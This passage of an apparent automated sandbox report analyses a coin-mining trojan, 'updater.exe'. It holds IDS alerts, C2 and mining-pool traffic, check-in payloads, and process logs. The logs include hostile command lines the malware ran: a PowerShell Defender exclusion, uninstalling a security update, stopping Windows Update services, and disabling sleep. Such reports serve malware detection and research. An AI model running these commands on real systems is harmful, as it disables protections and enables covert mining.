                                         .rsrc | 0x28f000 | 0x10c20 | 0x10e00 | ae67c3bd634cdd0f12fab93b480626c3 | False | 0.11255787037037036 | data | 4.6448197984454485 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                         .reloc | 0x2a0000 | 0x78 | 0x200 | abf2c05a4fabfc8918f09b1b70ae0c6d | False | 0.2265625 | data | 1.4235256539400882 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                         Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                         RT_ICON | 0x28f0f0 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3779 x 3779 px/m | English | United States | 0.1083638944753342
                                         RT_GROUP_ICON | 0x29f918 | 0x14 | data | English | United States | 1.15
                                         RT_VERSION | 0x29f930 | 0x2f0 | SysEx File - IDP | English | United States | 0.449468085106383
                                         DLL | Import
                                         msvcrt.dll | __C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, signal, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp
                                         KERNEL32.dll | DeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery
                                         Language of compilation system | Country where language is spoken | Map
                                         English | United States |
                                         Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                         2024-10-06T01:46:02.663461+0200 | 2826930 | ETPRO COINMINER XMR CoinMiner Usage | 2 | 192.168.11.20 | 49757 | 5.161.70.189 | 23333 | TCP
                                         2024-10-06T01:46:18.491045+0200 | 2051004 | ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request | 2 | 192.168.11.20 | 49758 | 172.67.162.29 | 80 | TCP
                                         2024-10-06T01:47:17.850114+0200 | 2051004 | ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request | 2 | 192.168.11.20 | 49760 | 172.67.162.29 | 80 | TCP
                                         2024-10-06T01:48:19.635954+0200 | 2051004 | ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request | 2 | 192.168.11.20 | 49761 | 172.67.162.29 | 80 | TCP
                                         Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                         Oct 6, 2024 01:46:16.849565029 CEST | 49757 | 23333 | 192.168.11.20 | 5.161.70.189
                                         Oct 6, 2024 01:46:16.948919058 CEST | 23333 | 49757 | 5.161.70.189 | 192.168.11.20
                                         Oct 6, 2024 01:46:16.949174881 CEST | 49757 | 23333 | 192.168.11.20 | 5.161.70.189
                                         Oct 6, 2024 01:46:16.949285984 CEST | 49757 | 23333 | 192.168.11.20 | 5.161.70.189
                                         Oct 6, 2024 01:46:17.048655033 CEST | 23333 | 49757 | 5.161.70.189 | 192.168.11.20
                                         Oct 6, 2024 01:46:17.049524069 CEST | 23333 | 49757 | 5.161.70.189 | 192.168.11.20
                                         Oct 6, 2024 01:46:17.095966101 CEST | 49757 | 23333 | 192.168.11.20 | 5.161.70.189
                                         Oct 6, 2024 01:46:17.891340971 CEST | 49758 | 80 | 192.168.11.20 | 172.67.162.29
                                         Oct 6, 2024 01:46:17.985747099 CEST | 80 | 49758 | 172.67.162.29 | 192.168.11.20
                                         Oct 6, 2024 01:46:17.986076117 CEST | 49758 | 80 | 192.168.11.20 | 172.67.162.29
                                         Oct 6, 2024 01:46:17.986577034 CEST | 49758 | 80 | 192.168.11.20 | 172.67.162.29
                                         Oct 6, 2024 01:46:18.080822945 CEST | 80 | 49758 | 172.67.162.29 | 192.168.11.20
                                         Oct 6, 2024 01:46:18.081039906 CEST | 49758 | 80 | 192.168.11.20 | 172.67.162.29
                                         Oct 6, 2024 01:46:18.175137997 CEST | 80 | 49758 | 172.67.162.29 | 192.168.11.20
                                         Oct 6, 2024 01:46:18.490771055 CEST | 80 | 49758 | 172.67.162.29 | 192.168.11.20
                                         Oct 6, 2024 01:46:18.491044998 CEST | 49758 | 80 | 192.168.11.20 | 172.67.162.29
                                         Oct 6, 2024 01:46:18.491503954 CEST | 80 | 49758 | 172.67.162.29 | 192.168.11.20
                                         Oct 6, 2024 01:46:18.491619110 CEST | 49758 | 80 | 192.168.11.20 | 172.67.162.29
                                         Oct 6, 2024 01:46:18.585448980 CEST | 80 | 49758 | 172.67.162.29 | 192.168.11.20
                                         Oct 6, 2024 01:46:31.269527912 CEST | 23333 | 49757 | 5.161.70.189 | 192.168.11.20
                                         Oct 6, 2024 01:46:31.311666965 CEST | 49757 | 23333 | 192.168.11.20 | 5.161.70.189
                                         Oct 6, 2024 01:46:34.779458046 CEST | 23333 | 49757 | 5.161.70.189 | 192.168.11.20
                                         Oct 6, 2024 01:46:34.826587915 CEST | 49757 | 23333 | 192.168.11.20 | 5.161.70.189
                                         Oct 6, 2024 01:47:08.344537973 CEST | 23333 | 49757 | 5.161.70.189 | 192.168.11.20
                                         Oct 6, 2024 01:47:08.397273064 CEST | 49757 | 23333 | 192.168.11.20 | 5.161.70.189
                                         Oct 6, 2024 01:47:17.237003088 CEST | 49760 | 80 | 192.168.11.20 | 172.67.162.29
                                         Oct 6, 2024 01:47:17.332417965 CEST | 80 | 49760 | 172.67.162.29 | 192.168.11.20
                                         Oct 6, 2024 01:47:17.332753897 CEST | 49760 | 80 | 192.168.11.20 | 172.67.162.29
                                         Oct 6, 2024 01:47:17.348447084 CEST | 49760 | 80 | 192.168.11.20 | 172.67.162.29
                                         Oct 6, 2024 01:47:17.443732977 CEST | 80 | 49760 | 172.67.162.29 | 192.168.11.20
                                         Oct 6, 2024 01:47:17.443960905 CEST | 49760 | 80 | 192.168.11.20 | 172.67.162.29
                                         Oct 6, 2024 01:47:17.539619923 CEST | 80 | 49760 | 172.67.162.29 | 192.168.11.20
                                         Oct 6, 2024 01:47:17.849739075 CEST | 80 | 49760 | 172.67.162.29 | 192.168.11.20
                                         Oct 6, 2024 01:47:17.850114107 CEST | 49760 | 80 | 192.168.11.20 | 172.67.162.29
                                         Oct 6, 2024 01:47:17.850446939 CEST | 80 | 49760 | 172.67.162.29 | 192.168.11.20
                                         Oct 6, 2024 01:47:17.850637913 CEST | 49760 | 80 | 192.168.11.20 | 172.67.162.29
                                         Oct 6, 2024 01:47:17.945564985 CEST | 80 | 49760 | 172.67.162.29 | 192.168.11.20
                                         Oct 6, 2024 01:47:42.220110893 CEST | 23333 | 49757 | 5.161.70.189 | 192.168.11.20
                                         Oct 6, 2024 01:47:42.264868021 CEST | 49757 | 23333 | 192.168.11.20 | 5.161.70.189
                                         Oct 6, 2024 01:48:16.775685072 CEST | 23333 | 49757 | 5.161.70.189 | 192.168.11.20
                                         Oct 6, 2024 01:48:16.819756031 CEST | 49757 | 23333 | 192.168.11.20 | 5.161.70.189
                                         Oct 6, 2024 01:48:19.027434111 CEST | 49761 | 80 | 192.168.11.20 | 172.67.162.29
                                         Oct 6, 2024 01:48:19.122524023 CEST | 80 | 49761 | 172.67.162.29 | 192.168.11.20
                                         Oct 6, 2024 01:48:19.123425961 CEST | 49761 | 80 | 192.168.11.20 | 172.67.162.29
                                         Oct 6, 2024 01:48:19.123850107 CEST | 49761 | 80 | 192.168.11.20 | 172.67.162.29
                                         Oct 6, 2024 01:48:19.218938112 CEST | 80 | 49761 | 172.67.162.29 | 192.168.11.20
                                         Oct 6, 2024 01:48:19.220191956 CEST | 49761 | 80 | 192.168.11.20 | 172.67.162.29
                                         Oct 6, 2024 01:48:19.315288067 CEST | 80 | 49761 | 172.67.162.29 | 192.168.11.20
                                         Oct 6, 2024 01:48:19.635543108 CEST | 80 | 49761 | 172.67.162.29 | 192.168.11.20
                                         Oct 6, 2024 01:48:19.635953903 CEST | 49761 | 80 | 192.168.11.20 | 172.67.162.29
                                         Oct 6, 2024 01:48:19.636218071 CEST | 80 | 49761 | 172.67.162.29 | 192.168.11.20
                                         Oct 6, 2024 01:48:19.636392117 CEST | 49761 | 80 | 192.168.11.20 | 172.67.162.29
                                         Oct 6, 2024 01:48:19.731340885 CEST | 80 | 49761 | 172.67.162.29 | 192.168.11.20
                                         Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                         Oct 6, 2024 01:46:16.669233084 CEST | 53898 | 53 | 192.168.11.20 | 1.1.1.1
                                         Oct 6, 2024 01:46:16.847032070 CEST | 53 | 53898 | 1.1.1.1 | 192.168.11.20
                                         Oct 6, 2024 01:46:17.793313980 CEST | 49237 | 53 | 192.168.11.20 | 1.1.1.1
                                         Oct 6, 2024 01:46:17.890455961 CEST | 53 | 49237 | 1.1.1.1 | 192.168.11.20
                                         Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                         Oct 6, 2024 01:46:16.669233084 CEST | 192.168.11.20 | 1.1.1.1 | 0xea37 | Standard query (0) | auto.c3pool.org | A (IP address) | IN (0x0001) | false
                                         Oct 6, 2024 01:46:17.793313980 CEST | 192.168.11.20 | 1.1.1.1 | 0x5851 | Standard query (0) | minerchenzhi888.top | A (IP address) | IN (0x0001) | false
                                         Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                         Oct 6, 2024 01:46:16.847032070 CEST | 1.1.1.1 | 192.168.11.20 | 0xea37 | No error (0) | auto.c3pool.org | | 5.161.65.155 | A (IP address) | IN (0x0001) | false
                                         Oct 6, 2024 01:46:16.847032070 CEST | 1.1.1.1 | 192.168.11.20 | 0xea37 | No error (0) | auto.c3pool.org | | 5.161.70.189 | A (IP address) | IN (0x0001) | false
                                         Oct 6, 2024 01:46:17.890455961 CEST | 1.1.1.1 | 192.168.11.20 | 0x5851 | No error (0) | minerchenzhi888.top | | 172.67.162.29 | A (IP address) | IN (0x0001) | false
                                         Oct 6, 2024 01:46:17.890455961 CEST | 1.1.1.1 | 192.168.11.20 | 0x5851 | No error (0) | minerchenzhi888.top | | 104.21.10.17 | A (IP address) | IN (0x0001) | false
                                        • minerchenzhi888.top
                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                         0 | 192.168.11.20 | 49758 | 172.67.162.29 | 80 | 6248 | C:\Windows\System32\svchost.exe
                                         Timestamp | Bytes transferred | Direction | Data
                                         Oct 6, 2024 01:46:17.986577034 CEST | 179 | OUT | POST /api/endpoint.php HTTP/1.1
                                        Accept: */*
                                        Connection: close
                                        Content-Length: 467
                                        Content-Type: application/json
                                        Host: minerchenzhi888.top
                                        User-Agent: cpp-httplib/0.12.6
                                         Oct 6, 2024 01:46:18.081039906 CEST | 467 | OUT | Data Raw: 7b 22 69 64 22 3a 22 68 6c 68 77 7a 6a 77 72 78 72 65 77 62 62 6c 78 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 36 31 30 39 33 30 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 49 6e 74 65 6c 28
                                        Data Ascii: {"id":"hlhwzjwrxrewbblx","computername":"610930","username":"SYSTEM","gpu":"Intel(R) UHD Graphics 630","cpu":"Intel(R) Core(TM) i9-9900K CPU @ 3.60GHz","remoteconfig":"","version":"3.4.0","activewindow":"Running as System","runtime":1,"type":"
                                         Oct 6, 2024 01:46:18.490771055 CEST | 732 | IN | HTTP/1.1 521
                                        Date: Sat, 05 Oct 2024 23:46:18 GMT
                                        Content-Type: text/plain; charset=UTF-8
                                        Content-Length: 15
                                        Connection: close
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BjLUvqPF9MP%2Fm1mKY%2BAytMm%2FY3Q79reTSgpbzW0keWzHrSsWoytKEnAfGPJ6%2FGQSG7SP1FAHtP1VLttBZ2jYmnWy%2BAF5kvVxJcjx4ZdvvVkTD%2Fm6zwlLxi%2FmdAugTfNsy5IcHB77"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        X-Frame-Options: SAMEORIGIN
                                        Referrer-Policy: same-origin
                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                        Server: cloudflare
                                        CF-RAY: 8ce14a4ebcef0c7a-EWR
                                        Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 31
                                        Data Ascii: error code: 521


                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                         1 | 192.168.11.20 | 49760 | 172.67.162.29 | 80 | 6248 | C:\Windows\System32\svchost.exe
                                         Timestamp | Bytes transferred | Direction | Data
                                         Oct 6, 2024 01:47:17.348447084 CEST | 179 | OUT | POST /api/endpoint.php HTTP/1.1
                                        Accept: */*
                                        Connection: close
                                        Content-Length: 483
                                        Content-Type: application/json
                                        Host: minerchenzhi888.top
                                        User-Agent: cpp-httplib/0.12.6
                                         Oct 6, 2024 01:47:17.443960905 CEST | 483 | OUT | Data Raw: 7b 22 69 64 22 3a 22 68 6c 68 77 7a 6a 77 72 78 72 65 77 62 62 6c 78 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 36 31 30 39 33 30 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 49 6e 74 65 6c 28
                                        Data Ascii: {"id":"hlhwzjwrxrewbblx","computername":"610930","username":"SYSTEM","gpu":"Intel(R) UHD Graphics 630","cpu":"Intel(R) Core(TM) i9-9900K CPU @ 3.60GHz","remoteconfig":"","version":"3.4.0","activewindow":"Running as System","runtime":60,"type":
                                         Oct 6, 2024 01:47:17.849739075 CEST | 720 | IN | HTTP/1.1 521
                                        Date: Sat, 05 Oct 2024 23:47:17 GMT
                                        Content-Type: text/plain; charset=UTF-8
                                        Content-Length: 15
                                        Connection: close
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kk0IzNwxRMU5c5XpUDeXaZHZ3SnZbTiObWHooBPAflhc3ySEOtxGCiv2O9aSiF0qAg0TbD5gR0RafQLKT34tUb2jbtD18jCeBt4d8v4HFcVITU%2BxVplByoRMpB3ESzIvxRcw6umq"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        X-Frame-Options: SAMEORIGIN
                                        Referrer-Policy: same-origin
                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                        Server: cloudflare
                                        CF-RAY: 8ce14bc1b8974316-EWR
                                        Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 31
                                        Data Ascii: error code: 521


                                         Session ID | Source IP | Source Port | Destination IP | Destination Port
                                         2 | 192.168.11.20 | 49761 | 172.67.162.29 | 80
                                         Timestamp | Bytes transferred | Direction | Data
                                         Oct 6, 2024 01:48:19.123850107 CEST | 179 | OUT | POST /api/endpoint.php HTTP/1.1
                                        Accept: */*
                                        Connection: close
                                        Content-Length: 484
                                        Content-Type: application/json
                                        Host: minerchenzhi888.top
                                        User-Agent: cpp-httplib/0.12.6
                                         Oct 6, 2024 01:48:19.220191956 CEST | 484 | OUT | Data Raw: 7b 22 69 64 22 3a 22 68 6c 68 77 7a 6a 77 72 78 72 65 77 62 62 6c 78 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 36 31 30 39 33 30 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 49 6e 74 65 6c 28
                                        Data Ascii: {"id":"hlhwzjwrxrewbblx","computername":"610930","username":"SYSTEM","gpu":"Intel(R) UHD Graphics 630","cpu":"Intel(R) Core(TM) i9-9900K CPU @ 3.60GHz","remoteconfig":"","version":"3.4.0","activewindow":"Running as System","runtime":122,"type"
                                         Oct 6, 2024 01:48:19.635543108 CEST | 722 | IN | HTTP/1.1 521
                                        Date: Sat, 05 Oct 2024 23:48:19 GMT
                                        Content-Type: text/plain; charset=UTF-8
                                        Content-Length: 15
                                        Connection: close
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F5aR7RV5Yv5rzGodXAqFE4KDYUJFhjqtaEyBJX9zf%2F6DvrcFcGwSGKJiqWeqdzulgFo00Rn6n98wFoGXkV4kZEdifjw3fttpl9aOwUF5y4D5PfcH1md7ux44mm%2F70gK88q6y8P7u"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        X-Frame-Options: SAMEORIGIN
                                        Referrer-Policy: same-origin
                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                        Server: cloudflare
                                        CF-RAY: 8ce14d43de9f8c21-EWR
                                        Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 31
                                        Data Ascii: error code: 521


                                        Target ID:0
                                        Start time:19:46:09
                                        Start date:05/10/2024
                                        Path:C:\Users\user\Desktop\updater.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Users\user\Desktop\updater.exe"
                                        Imagebase:0x7ff6568e0000
                                        File size:2'728'960 bytes
                                        MD5 hash:A0C374F31894AA332D158F56608C89C3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        Target ID:1
                                        Start time:19:46:09
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                        Imagebase:0x7ff7f8990000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:2
                                        Start time:19:46:09
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:5
                                        Start time:19:46:11
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                        Imagebase:0x7ff7dfec0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:6
                                        Start time:19:46:11
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:7
                                        Start time:19:46:11
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                        Imagebase:0x7ff64fec0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:8
                                        Start time:19:46:11
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:9
                                        Start time:19:46:11
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\wusa.exe
                                        Wow64 process (32bit):false
                                        Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                        Imagebase:0x7ff752950000
                                        File size:316'416 bytes
                                        MD5 hash:E43499EE2B4CF328A81BACE9B1644C5D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        Target ID:10
                                        Start time:19:46:11
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                        Imagebase:0x7ff64fec0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:11
                                        Start time:19:46:12
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:12
                                        Start time:19:46:12
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                        Imagebase:0x7ff64fec0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:13
                                        Start time:19:46:12
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:14
                                        Start time:19:46:12
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop bits
                                        Imagebase:0x7ff64fec0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:15
                                        Start time:19:46:12
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:16
                                        Start time:19:46:12
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop dosvc
                                        Imagebase:0x7ff64fec0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:17
                                        Start time:19:46:12
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:18
                                        Start time:19:46:12
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                        Imagebase:0x7ff7cb0d0000
                                        File size:96'256 bytes
                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:19
                                        Start time:19:46:12
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                        Imagebase:0x7ff7cb0d0000
                                        File size:96'256 bytes
                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:20
                                        Start time:19:46:12
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:21
                                        Start time:19:46:12
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                        Imagebase:0x7ff7cb0d0000
                                        File size:96'256 bytes
                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:22
                                        Start time:19:46:12
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:23
                                        Start time:19:46:12
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                        Imagebase:0x7ff7cb0d0000
                                        File size:96'256 bytes
                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:24
                                        Start time:19:46:12
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:25
                                        Start time:19:46:12
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
                                        Imagebase:0x7ff64fec0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:26
                                        Start time:19:46:12
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7dd700000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:27
                                        Start time:19:46:12
                                        Start date:05/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
